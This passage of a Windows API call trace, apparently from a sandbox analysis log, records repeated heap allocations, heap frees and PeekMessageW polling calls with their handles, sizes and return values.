returned 1 [0136.696] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0136.696] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e240 [0136.696] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.697] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e240 | out: hHeap=0x12c0000) returned 1 [0136.697] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.697] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0136.697] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6e0 [0136.697] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0136.697] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0136.697] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0136.697] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0136.697] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e180 [0136.697] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.697] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e180 | out: hHeap=0x12c0000) returned 1 [0136.697] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.697] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0136.697] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6e0 [0136.697] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491898 [0136.697] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491898 | out: hHeap=0x12c0000) returned 1 [0136.697] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0136.697] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0136.697] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132dfc0 [0136.697] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.697] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132dfc0 | out: hHeap=0x12c0000) returned 1 [0136.697] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.697] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0136.697] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6e0 [0136.697] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491898 [0136.698] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491898 | out: hHeap=0x12c0000) returned 1 [0136.698] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0136.698] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0136.698] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132dec0 [0136.698] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.698] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132dec0 | out: hHeap=0x12c0000) returned 1 [0136.698] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.698] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0136.698] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6e0 [0136.698] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0136.698] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0136.698] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0136.698] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0136.698] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132df40 [0136.698] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.698] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132df40 | out: hHeap=0x12c0000) returned 1 [0136.698] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.698] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0136.698] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6e0 [0136.698] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0136.698] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0136.698] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0136.699] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0136.699] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e080 [0136.699] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.699] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e080 | out: hHeap=0x12c0000) returned 1 [0136.699] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.699] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0136.699] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6e0 [0136.699] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0136.699] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0136.699] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0136.699] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0136.699] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e000 [0136.699] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.699] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e000 | out: hHeap=0x12c0000) returned 1 [0136.699] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.699] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6e0 [0136.699] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0136.699] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0136.699] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0136.699] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0136.699] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0136.700] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e280 [0136.700] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.700] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e280 | out: hHeap=0x12c0000) returned 1 [0136.700] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.700] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0136.700] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6e0 [0136.700] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0136.700] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0136.700] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0136.700] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0136.700] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e600 [0136.700] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.700] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e600 | out: hHeap=0x12c0000) returned 1 [0136.700] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.700] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0136.700] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6e0 [0136.700] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x14917d8 [0136.701] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14917d8 | out: hHeap=0x12c0000) returned 1 [0136.701] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0136.701] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0136.701] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e580 [0136.701] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.701] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e580 | out: hHeap=0x12c0000) returned 1 [0136.701] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.701] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0136.701] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6e0 [0136.701] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491898 [0136.701] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491898 | out: hHeap=0x12c0000) returned 1 [0136.701] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0136.701] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0136.701] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e500 [0136.701] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.701] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e500 | out: hHeap=0x12c0000) returned 1 [0136.701] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.701] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0136.701] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6e0 [0136.701] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491898 [0136.702] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491898 | out: hHeap=0x12c0000) returned 1 [0136.702] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0136.702] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0136.702] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e000 [0136.702] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.702] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e000 | out: hHeap=0x12c0000) returned 1 [0136.702] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.702] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0136.702] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6e0 [0136.718] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491898 [0136.718] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491898 | out: hHeap=0x12c0000) returned 1 [0136.718] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0136.718] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0136.718] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e240 [0136.718] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.718] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e240 | out: hHeap=0x12c0000) returned 1 [0136.718] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.718] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6e0 [0136.719] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0136.719] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0136.719] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0136.719] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0136.719] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0136.719] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e500 [0136.719] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.719] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e500 | out: hHeap=0x12c0000) returned 1 [0136.719] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.719] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0136.719] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6e0 [0136.719] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0136.719] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0136.719] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0136.719] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0136.719] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e5c0 [0136.719] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.719] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e5c0 | out: hHeap=0x12c0000) returned 1 [0136.719] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.720] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0136.720] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6e0 [0136.720] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0136.720] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0136.720] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0136.720] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0136.720] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e140 [0136.720] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.720] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e140 | out: hHeap=0x12c0000) returned 1 [0136.720] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.720] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0136.720] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6e0 [0136.720] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491898 [0136.720] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491898 | out: hHeap=0x12c0000) returned 1 [0136.720] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0136.720] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0136.720] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e340 [0136.720] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.720] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e340 | out: hHeap=0x12c0000) returned 1 [0136.720] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.720] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0136.721] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6e0 [0136.721] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0136.721] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0136.721] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0136.721] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0136.721] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e440 [0136.721] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.721] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e440 | out: hHeap=0x12c0000) returned 1 [0136.721] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.721] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0136.721] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6e0 [0136.721] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0136.722] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0136.722] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0136.722] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0136.722] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e180 [0136.722] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.722] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e180 | out: hHeap=0x12c0000) returned 1 [0136.722] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.722] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0136.722] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6e0 [0136.722] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0136.722] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0136.722] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0136.722] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0136.722] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e600 [0136.722] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.722] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e600 | out: hHeap=0x12c0000) returned 1 [0136.722] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.722] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0136.722] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6e0 [0136.722] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x14917d8 [0136.722] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14917d8 | out: hHeap=0x12c0000) returned 1 [0136.723] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0136.723] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0136.723] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e240 [0136.723] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.723] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e240 | out: hHeap=0x12c0000) returned 1 [0136.723] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.723] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0136.723] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6e0 [0136.723] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0136.723] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0136.723] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0136.723] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0136.723] RtlAllocateHeap 